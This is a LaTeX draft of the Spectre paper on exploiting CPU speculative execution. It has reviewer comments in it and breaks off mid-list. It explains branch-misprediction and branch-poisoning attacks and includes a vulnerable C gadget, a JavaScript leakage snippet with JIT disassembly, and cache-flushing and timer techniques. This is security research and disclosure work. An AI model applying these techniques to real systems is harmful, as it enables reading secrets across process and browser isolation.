\newif\ifDraft\Draftfalse

\documentclass[letterpaper,twocolumn,10pt]{article}
\usepackage{usenix,epsfig,endnotes}
\usepackage{tugraz_defaults}
\usepackage{xcolor}
\usepackage[nameinlink,noabbrev,capitalize]{cleveref}
\usepackage[hidelinks]{hyperref}

\ifDraft
\usepackage[draft,llncssubsub]{dtrt}
\else
\usepackage[camera,llncssubsub]{dtrt}
\fi

\newcommand{\SHORTBIB}[1]{}

\newcommand{\paul}[1]{\dtcolornote[Paul]{red}{#1}}

\newcommand{\yval}[1]{\dtcolornote[Yval]{orange}{#1}}

\author{{\rm Paul Kocher}$^1$, {\rm Daniel Genkin}$^2$, {\rm Daniel Gruss}$^3$, {\rm Werner Haas}$^4$, {\rm Mike Hamburg}$^5$, \\ {\rm  Moritz Lipp}$^3$, {\rm Stefan Mangard}$^3$, {\rm Thomas Prescher}$^4$, {\rm Michael Schwarz}$^3$, {\rm Yuval Yarom}$^6$ \\
$^1$ Independent \\
$^2$ University of Pennsylvania and University of Maryland \\
$^3$ Graz University of Technology \\
$^4$ Cyberus Technology \\
$^5$ Rambus, Cryptography Research Division \\
$^6$ University of Adelaide and Data61 \\
}

\title{\mbox{Spectre Attacks: \ } \mbox{Exploiting Speculative Execution}\thanks{
After reporting the results here, we were informed that our work partly overlaps the 
results of independent work done at Google's Project Zero.}}

\begin{document}

\maketitle

\begin{abstract}
Modern processors use branch prediction and speculative execution to maximize performance. 
For example, if the destination of a branch depends on a memory value that is in the process of being read, 
CPUs will try guess the destination and attempt to execute ahead. 
When the memory value finally arrives, the CPU either discards or commits the speculative computation. 
Speculative logic is unfaithful in how it executes, can access to the victim's memory and registers, 
and can perform operations with measurable side effects. 

Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during correct 
program execution and which leak the victim's confidential information via a side channel to the adversary.  
This paper describes practical attacks that combine methodology from side channel attacks, 
fault attacks, and return-oriented programming that can read arbitrary memory from the victim's process.  
More broadly, the paper shows that
speculative execution implementations violate the security assumptions underpinning numerous 
software security mechanisms, including operating system process separation, static analysis, containerization, 
just-in-time (JIT) compilation, and countermeasures to cache timing/side-channel attacks.  
These attacks represent a serious threat to actual systems, since vulnerable speculative execution capabilities 
are found in microprocessors from Intel, AMD, and ARM that are used in billions of devices.

While makeshift processor-specific countermeasures are possible in some cases, sound solutions will 
require fixes to processor designs as well as updates to instruction set architectures (ISAs) to give 
hardware architects and software developers a common understanding as to what computation state 
CPU implementations are (and are not) permitted to leak.
\end{abstract}

\section{Introduction}
Computations performed by physical devices often leave observable side effects beyond the computation's nominal outputs.
Side channel attacks focus on exploiting these side effects in order to extract otherwise-unavailable secret information.   
Since their introduction in the late 90's~\cite{Kocher96}, many physical effects such as power 
consumption~\cite{Kocher99differentialpower,kjjr11introduction}, 
electromagnetic radiation~\cite{quisquaterElectromagnetic}, or acoustic noise~\cite{GST14acoustic-norefs} 
have been leveraged to extract cryptographic keys as well as other secrets.

While physical side channel attacks can be used to extract secret information from complex devices such as 
PCs and mobile phones~\cite{GPST16,GPPTY16ecdsa}, these devices face additional threats that do not 
require external measurement equipment because they execute code from potentially unknown origins. 
While some software-based attacks exploit software vulnerabilities (such as buffer overflow~\paul{NeedReference} 
or use-after-free vulnerabilities~\paul{NeedReference}) other software attacks leverage hardware vulnerabilities 
in order to leak sensitive information.  Attacks of the latter type include microarchitectural attacks exploiting 
cache timing~\cite{Ber05, Percival05,RSA:OsvShaTro06,CHES:TSSSM03,SP:GulBanKre11, YaromF14,YLGHL15}, 
branch prediction history~\cite{RSA:AciKocSei07,IMA:AciGueSei07},  or Branch Target 
Buffers~\cite{LeeSGKKP17,EvtyushkinPA16}). Software-based techniques have also been used to mount fault 
attacks that alter physical memory~\cite{RowHammer} or internal CPU values~\cite{ClkScrew}. 

Speculative execution is a technique used by high-speed processors in order to increase performance by 
guessing likely future execution paths and prematurely executing the instructions in them. For example when the 
program's control flow depends on an uncached value located in the physical memory, 
it may take several hundred clock cycles before the value becomes known. 
Rather than wasting these cycles by idling, the processor guesses the direction of control flow, 
saves a checkpoint of its register state, and proceeds to speculatively execute the program on the guessed path. 
When the value eventually arrives from memory the processor checks the correctness of its initial guess.  
If the guess was wrong, the processor discards the (incorrect) speculative execution by reverting the 
register state back to the stored checkpoint, resulting in performance comparable to idling. 
In case the guess was correct, however, the speculative execution results are committed, 
yielding a significant performance gain as useful work was accomplished during the delay.

From a security perspective, speculative execution involves executing a program in possibly incorrect ways.  
However, as processors are designed to revert the results of an incorrect speculative execution on their 
prior state to maintain correctness, these errors were previously assumed not to have any security implications.

\subsection{Our Results}
\parhead{Exploiting Speculative Execution} In this paper, we show a new class of microarchitectural attacks 
which we call Spectre attacks. At a high level, Spectre attacks trick the processor into speculatively executing 
instructions sequences that should not have executed during correct program execution. As the effects of these 
instructions on the nominal CPU state will be eventually reverted, we call them \emph{transient instructions}. 
By carefully choosing which transient instructions are speculatively executed, we are able to leak information 
from within the victim's memory address space. 

We empirically demonstrate the feasibility of Spectre attacks by using transient instruction sequences in order to leak information  across security domains.

\parhead{Attacks using Native Code}
We created a simple victim program that contains secret data within its memory access space. Next, after compiling 
the victim program we searched the resulting binary and the operating system's shared libraries for instruction 
sequences that can be used to leak information from the victim's address space. Finally, we wrote an 
attacker program that exploits the CPU's speculative execution feature in order to execute the 
previously-found sequences as  transient instructions. Using this technique we were able to read the entire 
victim's memory address space, including the secrets stored within it. 

\parhead{Attacks using JavaScript}
In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it. 

\subsection{Our Techniques}
At a high level, a Spectre attack violates memory isolation boundaries by combining speculative execution with data exfiltration via microarchitectural covert channels. More specifically, in order to mount a Spectre attack,  an attacker starts by locating a sequence of instructions within the process address space which when executed acts as a covert channel transmitter which leaks the victim's memory or register contents. The attacker then tricks the CPU into speculatively and erroneously executing this instruction sequence, thereby leaking the victim's information over the covert channel.  Finally, the attacker retrieves the victim's information over the covert channel. While the changes to the nominal CPU state resulting from this erroneous speculative execution are eventually reverted, changes to other microarchitectural parts of the CPU (such as cache contents) can survive nominal state reversion. 

The above description of Spectre attacks is general, and needs to be concretely instantiated with a way to induce erroneous speculative execution as well as with a microarchitectural covert channel. While many choices are possible for the covert channel component, the implementations described in this work use a cache-based covert channel using Flush+Reload~\cite{YF14} or Evict+Reload~\cite{YLGHL15} techniques. 

We now proceed to describe our techniques for inducing and influencing erroneous speculative execution.

\parhead{Exploiting Conditional Branches}
To exploit conditional branches, the attacker needs the branch predictor
to mispredict the direction of the branch, then the processor must speculatively execute
code that would not be otherwise executed which leaks the information sought by the attacker.
Here is an example of exploitable code:
\begin{verbatim}
    if (x < array1_size)
       y = array2[array1[x] * 256];
\end{verbatim}
In this example, the variable \texttt{x} contains attacker-controlled data.
The \texttt{if} statement compiles to a branch instruction, whose purpose is to verify 
that the value of \texttt{x} is within a legal range,
ensuring that the access to \texttt{array1} is valid.

For the exploit, the attacker first invokes the relevant code with valid inputs,
training the branch predictor to expect that the \texttt{if} will be true.
The attacker then invokes the code with a value of \texttt{x} outside the 
bounds of \texttt{array1}
and with \texttt{array1\_size} uncached.
The CPU guesses that the bounds check will be true, the speculatively executes 
the read from \texttt{array2[array1[x] * 256]} using the malicious \texttt{x}.  
The read from \texttt{array2} loads data into the 
cache at an address that is dependent on \texttt{array1[x]} using the malicious \texttt{x}.
The change in the cache state is not reverted when the processor realizes that the speculative
execution was erroneous, and can be detected by the adversary to find a byte of the victim's memory.
By repeating with different values of \texttt{x}, this construct can be exploited to read the victim's memory.

\parhead{Exploiting Indirect Branches}
Drawing from return-oriented programming (ROP)~\cite{CCS:Shacham07},
in this method the attacker chooses a \emph{gadget} from the address space of the victim
and influences the victim to execute the gadget speculatively.
Unlike ROP, the attacker does not rely on a vulnerability in the victim code.
Instead, the attacker trains the Branch Target Buffer (BTB) to mispredict a branch from 
an indirect branch instruction to the address of the gadget, resulting in a speculative execution
of the gadget.
While the speculatively executed instructions are abandoned, their
effects on the cache are not reverted.
These effects can be used by the gadget to leak sensitive information.
We show how, with a careful selection of a gadget, 
this method can be used to read arbitrary memory from the victim.

To mistrain the BTB, the attacker finds the virtual address of the gadget in the 
victim's address space, then performs indirect branches to this address.  
This training is done from the attacker's address
space, and it does not matter what resides at the gadget address in the attacker's address space; 
all that is required is that the branch used for training branches
to use the same destination virtual address.
(In fact, as long as the attacker handles exceptions, 
the attack can work even if there is no code mapped at the virtual address of the gadget
in the attacker's address space.)
There is also no need for a complete match of the source address of the
branch used for training and the address of the targetted branch.
Thus, the attacker has significant flexibility in setting up the training.

\parhead{Other Variants}
Further attacks can be designed by varying both the method of achieving speculative execution
and the method used to leak the information.
Examples of the former include mistraining return instructions or return from interrupts.
Examples of the latter include leaking information through timing variations or
by generating contention on arithmetic units.

\subsection{Targeted Hardware and Current Status }

\parhead{Hardware}
We have empirically verified the vulnerability of several Intel processors to Spectre attacks, including 
Ivy Bridge, Haswell and Skylake based processors. We have also verified the attack's applicability to AMD Ryzen CPUs. Finally, we have also successfully mounted Spectre attacks on several Samsung and Qualcomm processors (which use an ARM architecture) found in popular mobile phones.

\parhead{Current Status}
Using the practice of responsible disclosure, we have disclosed a preliminary version of our results to Intel, AMD, ARM, Qualcomm as well as to other CPU vendors. We have also contacted other companies including Amazon, Apple, Microsoft, Google and others. The Spectre family of attacks is documented under CVE-2017-5753 and CVE-2017-5715.  

\subsection{Meltdown}
Meltdown~\cite{Meltdown} is a related microarchitectural attack which exploits out-of-order execution in order to leak the target's physical memory. Meltdown is distinct from Spectre Attacks in two main ways. 
First, unlike Spectre, Meltdown does not use branch prediction for achieving speculative execution.
Instead, it relies on the observation that when an instruction causes a trap, following
instructions that were executed out-of-order are aborted.
Second, Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively
executed instructions can bypass memory protection.
Combining these issues, Meltdown accesses kernel memory from user space.
This access causes a trap, but before the trap is issued, the code that follows the
access leaks the contents of the accessed memory through a cache channel.

Unlike Meltdown, the Spectre attack works on non-Intel processors, including AMD and ARM processors.
Furthermore, the KAISER patch~\cite{Gruss2017Kaslr}, which has been widely applied as a mitigation
to the Meltdown attack, does not protect against Spectre.

\section{Background}
In this section we describe some of the microarchitectural components of
modern high-speed processors, how they improve the performance, 
and how they can leak information from running programs.  We also
describe return-oriented-programming (ROP) and `gadgets'.

\subsection{Out-of-order Execution}
An \emph{out-of-order} execution paradigm increases the utilization of the 
processor's components by allowing instructions further down the instruction stream of 
a program to be executed in parallel with, and sometimes before, preceding instructions.  

The processor queues completed instructions in the \emph{reorder buffer}.
Instructions in the reorder buffer are \emph{retired} in the program execution
order, \ie an instruction is only retired when all preceding instructions
have been completed and retired.  

Only upon retirement, the results of the retired instructions are committed
and made visible externally.

\subsection{Speculative Execution}
Often, the processor does not know the future instruction stream of a program.
For example, this occurs when out-of-order execution reaches a conditional branch 
instruction whose direction depends on preceding instructions whose execution 
has not completed yet.
In such cases, the processor can make save a checkpoint containing its
current register state, make a prediction
as to the path that the program will
follow, and \emph{speculatively} execute instructions along the path.
If the prediction turns out to be correct, the checkpoint is not needed and
instructions are retired in the
program execution order.
Otherwise, when the processor determines that it followed the wrong path,
it \emph{abandons} all pending instructions along the path by reloading its
state from the checkpoint and execution resumes
along the correct path.

Abandoning instructions is performed so that changes made by instructions outside the 
program execution path are not made visible to the program.
Hence, the speculative execution maintains the logical state of the program as if execution
followed the correct path.
\paul{Delete the following as not background material duplicative of other text:
However, abandoned instructions may affect the internal processor state 
in ways that are not reverted when the instructions are abandoned.
As we show in this paper, these changes can be observed by running programs,
leading to information-disclosure attack.}

\subsection{Branch Prediction}
Speculative execution requires that the processor make guesses as to the likely
outcome of branch instructions.  Better predictions improve performance by
increasing the number of speculatively executed operations that can be
successfully committed.

Several processor components are used for predicting the outcome of branches.
The Branch Target Buffer (BTB) keeps a mapping from addresses of recently
executed branch instructions to destination addresses~\cite{LeeSGKKP17}.
Processors can uses the BTB to predict future code addresses even before
decoding the branch instructions.
Evtyushkin~\etal\cite{EvtyushkinPA16} analyze the BTB of a Intel Haswell processor
and conclude that only the 30 least significant bits of the branch address
are used to index the BTB.
\paul{delete the following sentence since it's not background material?}
Our experiments on \yval{processors} \paul{I did this on Haswell, but would like independent confirmation esp since I was running in 32-bit mode} show similar results but that only 20 bits are required.

\paul{Not sure what the following is trying to say; except for the silly case where the branch destination is the next instruction, predicting the destination is as good or better than the conditional outcome... but it's less efficient to encode and could fail in worse ways.} For conditional branches, recording the target address is not sufficient for
predicting the outcome of the branch.
To predict whether a conditional branch is taken or not, the processor
maintains a record of recent branches outcomes.
Bhattacharya~\etal\cite{BhattacharyaMBM17} analyze the structure of 
branch history prediction in recent Intel processors.

\yval{Return stack}

\subsection{The Memory Hierarchy}
To bridge the speed gap between the faster processor and the slower memory,
processors use a hierarchy of successively smaller but faster caches.
The caches divide the memory into fixed-size chunks called \emph{lines},
with typical line sizes being 64 or 128 bytes.
When the processor needs data from memory, it first checks if
the \emph{L1} cache, at the top of the hierarchy, contains a copy.
In the case of a \emph{cache hit}, when the data is found in the cache,
the data is retrieved from the L1 cache and used.
Otherwise, in a \emph{cache miss}, the procedure is repeated
to retrieve the data from the
next cache level.
Additionally, the data is stored in the L1 cache, in case it
is needed again in the near future.
Modern Intel processors typically have three cache levels,
with each core having dedicated L1 and L2 caches and all cores
sharing a common L3 cache, also known as the Last-Level Cache (LLC).

\subsection{Microarchitectural Side-Channel Attacks}
All of the microarchitectural components we discuss above improve the processor
performance by predicting future program behavior.
To that aim, they maintain state that depends on past program behavior and
assume that future behavior is similar to or related to past behavior.

When multiple programs execute on the same hardware, either concurrently or via time sharing,
changes in the microarchitectural state caused by the behavior of one program
may affect other programs. 
This, in turn, may result in unintended information leaks from one program to another~\cite{GeYCH16}.
Past works have demonstrated attacks that leak information through the BTB~\cite{LeeSGKKP17,EvtyushkinPA16}, 
branch history~\cite{RSA:AciKocSei07,IMA:AciGueSei07}, and caches~\cite{RSA:OsvShaTro06,Percival05,CHES:TSSSM03,SP:GulBanKre11}.

In this work we use the Flush+Reload technique~\cite{SP:GulBanKre11,YaromF14} and its variant, Evict+Reload~\cite{GrussSM15}
for leaking sensitive information.
Using these techniques, the attacker begins by evicting from the cache a cache line shared with the victim.  After the victim executes for a while, the attacker measures the time it takes to perform a memory read at the address corresponding to the evicted cache line.
If the victim accessed the monitored cache line, the data will be in the cache and 
the access will be fast.
Otherwise, if the victim has not accessed the line, the read will be slow.
Hence, by measuring the access time, the attacker learns whether the victim accessed the monitored cache line between the eviction and probing steps.

The main difference between the two techniques is the mechanism used for evicting the monitored cache line from the cache.
In the Flush+Reload technique, the attacker uses a dedicated machine instruction, \eg x86's \texttt{clflush}, to evict the line.
In Evict+Reload, eviction is achieved by forcing contention on the cache set that stores the line, \eg by accessing other memory locations which get bought into the cache and (due to the limited size of the cache) cause the processor to discard the evict the line that is subsequently probed.

\subsection{Return-Oriented Programming}
Return-Oriented Programming (ROP)~\cite{CCS:Shacham07} is a technique for exploiting buffer overflow vulnerabilities.
The technique works by chaining machine code snippets, called \emph{gadgets} that are found in the
code of the vulnerable victim.
More specifically, the attacker first finds usable gadgets in the victim binary.
She then uses a buffer overflow vulnerability to write a sequence of addresses of gadgets
into the victim program stack.
Each gadget performs some computation before executing a return instruction.
The return instruction takes the return address from the stack, and because the attacker control this address, the return instruction effectively jumping into the next gadget in the chain.

\section{Attack Overview}

Spectre attacks induce a victim to speculatively perform operations that would not occur during correct program execution and which leak the victim's confidential information via a side channel to the adversary.  
We first describe variants that leverage conditional branch mispredictions (\cref{s:misprediction}), then variants that leverage misprediction of the targets of indirect branches (\cref{s:poisoning}).

In most cases, the attack begins with a setup phase, where the adversary performs operations that mistrain the processor so that it will later make an exploitably erroneous speculative prediction. In addition, the setup phase usually includes steps to that help induce speculative execution, such as performing targeted memory reads that cause the processor to evict from its cache a value that is required to determine the destination of a branching instruction.  During the setup phase, the adversary can also prepare the side channel that will be used for extracting the victim's information, e.g. by performing the flush or evict portion of a flush+reload or evict+reload attack.

During the second phase, the processor speculatively executes instruction(s) that transfer confidential information from the victim context into a microarchitectural side channel.  
This may be triggered by having the attacker request that the victim to perform an action (\eg via a syscall, socket, file, etc.).  In other cases, the attacker's may leverage the speculative (mis-)execution of its own code in order to obtain sensitive information from the same process (\eg if the attack code is sandboxed by an interpreter, just-in-time compiler, or `safe' language and wishes to read memory it is not supposed to access).  While speculative execution can potentially expose sensitive data via a broad range of side channels, the examples given cause speculative execution to read memory value at an attacker-chosen address then perform a memory operation that modifies the cache state in a way that exposes the value.

For the final phase, the sensitive data is recovered.  For Spectre attacks using 
flush+reload or evict+reload, the recovery process consists of 
timing how long reads take from memory addresses in the cache lines being
monitored.

Spectre attacks only assume that speculatively executed instructions can 
read from memory that the victim process could access normally, \eg without 
triggering a page fault or exception.  For example, if a processor prevents 
speculative execution of instructions in user processes from accessing kernel memory,
the attack will still work.~\cite{NegativeResult}.  As a result, Spectre is 
orthogonal to Meltdown~\cite{Meltdown} which exploits scenarios where 
some CPUs allow out-of-order execution of user
instructions to read kernel memory.

\section{Exploiting Conditional Branch Misprediction}\label{s:misprediction}


Consider the case where the code in \cref{lst:basic_example} is part of a function (such as a kernel syscall or cryptographic library) that receives an unsigned integer \texttt{x} from an untrusted source. 
The process running the code has access to an array of unsigned bytes \texttt{array1} of size \texttt{array1\_size}, and a second byte array \texttt{array2} of size 64KB.

\paul{FYI, I removed the 'float' on the listing and made it appear here}
\begin{lstlisting}[caption={Conditional Branch Example},label={lst:basic_example},language=C,style=customc,numbers=none]
if (x < array1_size)
   y = array2[array1[x] * 256];
\end{lstlisting}

The code fragment begins with a bounds check on \texttt{x} which is essential for security. 
In particular, this check prevents the processor from reading sensitive memory outside of \texttt{array1}. 
Otherwise, an out-of-bounds input \texttt{x} could trigger an exception or could cause the processor to access sensitive memory by supplying $\texttt{x} = ($address of a secret byte to read$) - ($base address of \texttt{array1}$)$.  

Unfortunately, during speculative execution, the conditional branch for the bounds check can follow the incorrect path. 
For example, suppose an adversary causes the code to run such that:

\begin{itemize}
\item the value of \texttt{x} is maliciously chosen (and out-of-bounds) such that \texttt{array1[x]} resolves to a secret byte $k$ somewhere in the victim's memory;
\item \texttt{array1\_size} and \texttt{array2} are not present in the processor's cache, but $k$ is cached; and
\item previous operations received values of \texttt{x} that were valid, leading the branch predictor to assume the \texttt{if} will likely be true.
\end{itemize}

This cache configuration can occur naturally or can be created by an adversary, \eg by simply reading a large amount of memory to fill the cache with unrelated values, then having the kernel use the secret key in a legitimate operation. 
If the cache structure is known~\cite{EPRINT:YGLLH15} or if the CPU provides a cache flush instruction (\eg the x86 \texttt{clflush} instruction) then the cache state can be achieved even more efficiently.

When the compiled code above runs, the processor begins by comparing the malicious value of \texttt{x} against \texttt{array1\_size}. 
Reading \texttt{array1\_size} results in a cache miss, and the processor faces a substantial delay until its value is available from DRAM. 
During this wait, the branch predictor assumes the \texttt{if} will be true, and the speculative execution logic adds \texttt{x} to the base address of \texttt{array1} and requests the data at the resulting address from the memory subsystem. 
This read is a cache hit, and quickly returns the value of the secret byte $k$. 
The speculative execution logic then uses $k$ to compute the address of \texttt{array2[$k$ * 256]}, then sends a request to read this address from memory (resulting in another cache miss). 
While the read from \texttt{array2} is pending, the value of \texttt{array1\_size} finally arrives from DRAM. 
The processor realizes that its speculative execution was erroneous, and rewinds its register state. 
However, on actual processors, the speculative read from \texttt{array2} affects the cache state in an address-specific manner, where the address depends on $k$. 

To complete the attack, the adversary simply needs to detect the change in the cache state to recover the secret byte $k$. 
This is easy if \texttt{array2} is readable by the attacker since the next read to \texttt{array2[$n$*256]} will be fast for $n$=$k$ and slow for all other $n \in 0..255$. 
Otherwise, a prime-and-probe attack~\cite{RSA:OsvShaTro06} can infer $k$ by detecting the eviction caused by the read from \texttt{array2}. 
Alternatively, the adversary can immediately call the target function again with an in-bounds value \texttt{x'} and measure how long the second call takes. 
If \texttt{array1[x']} equals $k$, then the location accessed in \texttt{array2} will be in the cache and the operation will tend to be faster than if $\texttt{array1[x']} != k$. 
This yields a memory comparison operation that, when called repeatedly, can solve for memory bytes as desired. 
Another variant leverages the cache state entering the speculative execution, since the performance of the speculative execution changes based on whether \texttt{array2[$k$*256]} was cached, which can then be inferred based on any measurable effects from subsequent speculatively-executed instructions.

\subsection{Discussion}

Experiments were performed on multiple x86 processor architectures, including Intel Ivy Bridge (i7-3630QM), Intel Haswell (i7-4650U), Intel Skylake (unspecified Xeon on Google Cloud), and AMD Ryzen. 
The Spectre vulnerability was observed on all of these CPUs. 
Similar results were observed on both 32- and 64-bit modes, and both Linux and Windows. 
Some ARM processors also support speculative execution~\cite{ArmSpeculative}, and initial testing has confirmed that ARM processors are impacted as well.

Speculative execution can proceed far ahead of the main processor. 
For example, on an i7 Surface Pro 3 (i7-4650U) used for most of the testing, the code in \cref{app:code} works with up to 188 simple instructions inserted in the source code between the `\texttt{if}' statement and the line accessing \texttt{array1}/\texttt{array2}.

\subsection{Example Implementation in C}

\cref{app:code} includes demonstration code in C for x86 processors.   

In this code, if the compiled instructions in \texttt{victim\_function()} were executed 
in strict program order, the function would only read from \texttt{array1[$0..15$]}
since $\texttt{array1\_size}=16$.  However, when executed 
speculatively, out-of-bounds reads are possible.

The \texttt{read\_memory\_byte()} function makes several training calls 
to \texttt{victim\_function()} to make the branch predictor expect valid values 
for \texttt{x}, then calls with an out-of-bounds \texttt{x}. The conditional 
branch mis-predicts, and the ensuing speculative execution reads a secret 
byte using the out-of-bounds \texttt{x}.  The speculative code then reads 
from \texttt{array2[array1[x] * 512]}, leaking the value of \texttt{array1[x]}
into the cache state.

To complete the attack, a simple flush+probe is used to identify
which cache line in \texttt{array2} was loaded, reveaing the memory contents.
The attack is repeated several times, so even if the target byte was initially
uncached, the first iteration will bring it into the cache.

The unoptimized code in \cref{app:code} reads approximately 10KB/second on an
i7 Surface Pro 3.

\subsection{Example Implementation in JavaScript}

\begin{lstlisting}[float=*,caption={Exploiting Speculative Execution via JavaScript.},label={lst:js_example},language=JavaScript]
if (index < simpleByteArray.length) {
  index = simpleByteArray[index | 0];
  index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
  localJunk ^= probeTable[index|0]|0;
}
\end{lstlisting}

\begin{lstlisting}[language={[x86masm]Assembler},style=customasm,float=*,caption={Disassembly of Speculative Execution in JavaScript Example (\cref{lst:js_example}).},label={lst:js_example_disasm}]
cmpl r15,[rbp-0xe0]               ; Compare index (r15) against simpleByteArray.length
jnc 0x24dd099bb870                ; If index >= length, branch to instruction after movq below
REX.W leaq rsi,[r12+rdx*1]        ; Set rsi=r12+rdx=addr of first byte in simpleByteArray
movzxbl rsi,[rsi+r15*1]           ; Read byte from address rsi+r15 (= base address+index)
shll rsi, 12                      ; Multiply rsi by 4096 by shifting left 12 bits}\%\
andl rsi,0x1ffffff                ; AND reassures JIT that next operation is in-bounds
movzxbl rsi,[rsi+r8*1]            ; Read from probeTable
xorl rsi,rdi                      ; XOR the read result onto localJunk
REX.W movq rdi,rsi                ; Copy localJunk into rdi
\end{lstlisting}

As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs (\cf \cref{lst:js_example}). 
The portion of the JavaScript code used to perform the leakage is as follows, where the 
constant $\texttt{TABLE1\_STRIDE}=4096$ and $\texttt{TABLE1\_BYTES}=2^{25}$:

On branch-predictor mistraining passes, \texttt{index} is set (via bit operations) to an in-range value, then on the final iteration index is set to an out-of-bounds address into \texttt{simpleByteArray}. 
The variable \texttt{localJunk} is used to ensure that operations are not optimized out, and the ``\texttt{|0}'' operations act as optimization hints to the JavaScript interpreter that values are integers.

Like other optimized JavaScript engines, V8 performs just-in-time compilation to convert JavaScript into machine language. 
To obtain the x86 disassembly of the JIT output during development, the command-line tool D8 was used. 
Manual tweaking of the source code leading up to the snippet above was done 
to get the value of \texttt{simpleByteArray.length} in local memory (instead of 
cached in a register or requiring multiple instructions to fetch). 
See \cref{lst:js_example_disasm} for the resulting disassembly output from D8 
(which uses AT\&T assembly syntax).

The \texttt{clflush} instruction is not accessible from JavaScript, so cache flushing was performed by reading a series of addresses at 4096-byte intervals out of a large array. 
Because of the memory and cache configuration on Intel processors, a series of \textasciitilde2000 such reads (depending on the processor's cache size) were adequate evict out the data from the processor's caches for addresses having the same value in address bits 11--6~\cite{EPRINT:YGLLH15}. 

The leaked results are conveyed via the cache status of \texttt{probeTable[$n$*4096]} for $n \in 0..255$, so each attempt begins with a flushing pass consisting of a series of reads made from \texttt{probeTable[$n$*4096]} using values of $n>256$. 
The cache appears to have several modes for deciding which address to evict, so to encourage a LRU (least-recently-used) mode, two indexes were used where the second trailed the first by several operations. 
The length parameter (\eg \texttt{[ebp-0xe0]} in the disassembly) needs to be evicted as well. 
Although its address is unknown, but there are only 64 possible 64-byte offsets relative to the 4096-byte boundary, so all 64 possibilities were tried to find the one that works.

JavaScript does not provide access to the \texttt{rdtscp} instruction, and Chrome intentionally degrades the accuracy of its 
high-resolution timer to dissuade timing attacks using \texttt{performance.now()}~\cite{ChromeBug508166}. 
However, the Web Workers feature of HTML5 makes it simple to create a separate thread that repeatedly 
decrements a value in a shared memory location~\cite{BreakingASLR,Schwarz2017Timers}. 
This approach yielded a high-resolution timer that provided sufficient resolution.

\section{Poisoning Indirect Branches}\label{s:poisoning}

Indirect branch instructions have the ability to jump to more than two possible target addresses. 
For example, x86 instructions can jump to an address in a register (``\texttt{jmp eax}''), an address in a memory location (``\texttt{jmp [eax]}'' or ``\texttt{jmp dword ptr [0x12345678]}''), or an address from the stack (``\texttt{ret}''). 
Indirect branches are also supported on ARM (\eg ``\texttt{MOV pc, r14}''), MIPS (\eg ``\texttt{jr \$ra}''), RISC-V (\eg ``\texttt{jalr x0,x1,0}''), and other processors.

If the determination of the destination address is delayed due to a cache miss and the branch predictor has been mistrained with malicious destinations, speculative execution may continue at a location chosen by the adversary. 
As a result, speculative execution can be misdirected to locations that would never occur during legitimate program execution. 
If speculative execution can leave measurable side effects, this is extremely powerful for attackers, for example exposing victim memory even in the absence of an exploitable conditional branch misprediction.

Consider the case where an attacker seeking to read a victim's memory controls the values in two registers (denoted R1 and R2) when an indirect branch occurs. 
This is a common scenario; functions that manipulate externally-received data routinely make function calls while registers contain values that an attacker can control.  (Often these values are ignored by the function; the registers are pushed on the stack at the beginning of the called function and restored at the end.)  

Assuming that the CPU limits speculative execution to instructions in memory executable by the victim, the adversary then needs to find a `gadget' whose speculative execution will leak chosen memory. 
For example, a such a gadget would be formed by two instructions (which do not necessarily need to be adjacent) where the first adds (or XORs, subtracts, etc.) the memory location addressed by R1 onto register R2, followed by any instruction that accesses memory at the address in R2. 
In this case, the gadget provides the attacker control (via R1) over which address to leak and control (via R2) over how the leaked memory maps to an address which gets read by the second instruction.  (The example implementation on Windows describes in more detail an example memory reading process using such a gadget.)

Numerous other exploitation scenarios are possible, depending on what state is known or controlled by the adversary, where the information sought by the adversary resides (\eg registers, stack, memory, etc.), the adversary's ability to control speculative execution, what instruction sequences are available to form gadgets, and what channels can leak information from speculative operations. 
For example, a cryptographic function that returns a secret value in a register may become exploitable if the attacker can simply induce speculative execution at an instruction that brings into the cache memory at the address specified in the register.  Likewise, although the example above assumes that the
attacker controls two registers (R1 and R2), attacker control over a single register, value on the stack, or memory value is sufficient for some gadgets.  

In many ways, exploitation is similar to return-oriented programming (ROP), except that correctly-written software is vulnerable, 
gadgets are limited in their duration but need not terminate cleanly (since the CPU will eventually recognize the speculative error), 
and gadgets must exfiltrate data via side channels rather than explicitly. 
Still, speculative execution can perform complex sequences of instructions, including reading from the stack, performing arithmetic, 
branching (including multiple times), and reading memory.

\subsection{Discussion}

Tests, primarily on a Haswell-based Surface Pro 3, confirmed that code executing in one hyper-thread of Intel x86 processors can mistrain the branch predictor for code running on the same CPU in a different hyper-thread. 
Tests on Skylake additionally indicated branch history mistraining between processes on the same vCPU (which likely occurs on Haswell as well).  

The branch predictor maintains a cache that maps a jump histories to predicted jump destinations, so successful mistraining requires 
convincing the branch predictor to create an entry whose history sufficiently mimics the victim's lead-up to the target branch, 
and whose prediction destination is the virtual address of the gadget.

Several relevant hardware and operating system implementation choices were observed, including:
\begin{itemize}
\item Speculative execution was only observed when the branch destination address was executable by the victim thread, so gadgets need to be present in the memory regions executable by the victim.
\item When multiple Windows applications share the same DLL, normally a single copy is loaded and (except for pages that are modified as described below) is mapped to the same virtual address for all processes using the DLL. 
For even a very simple Windows application, the executable DLL pages in the working set include several megabytes of executable code, which provides ample space to search for gadgets.
\item For both history matching and predictions, the branch predictor only appears to pay attention to branch destination virtual addresses. 
The source address of the instruction performing the jump, physical addresses, timing, and process ID do not appear to matter.
\item The algorithm that tracks and matches jump histories appears to use only the low \paul{20} bits of the virtual address (which are further reduced by simple hash function). 
As a result, an adversary does \textbf{not} need to be able to even execute code at any of the memory addresses containing the victim's branch instruction. 
ASLR can also be compensated, since upper bits are ignored and bits 15..0 do not appear to be randomized with ASLR in Win32 or Win64.
\item The branch predictor learns from jumps to illegal destinations. 
Although an exception is triggered in the attacker's process, this can be caught easily (e.g. using \texttt{try}...\texttt{catch} in C++).
The branch predictor will then make predictions that send \textit{other} processes to the illegal destination.
\item Mistraining effects across CPUs were not observed, suggesting that branch predictors on each CPU operate independently.  
\item DLL code and constant data regions can be read and \texttt{clflush}'ed by any process using the DLL, making them convenient to use as table areas in flush-and-probe attacks.
\item  DLL regions can be written by applications. 
A copy-on-write mechanism is used, so these modifications are only visible to the process that performs the modification. 
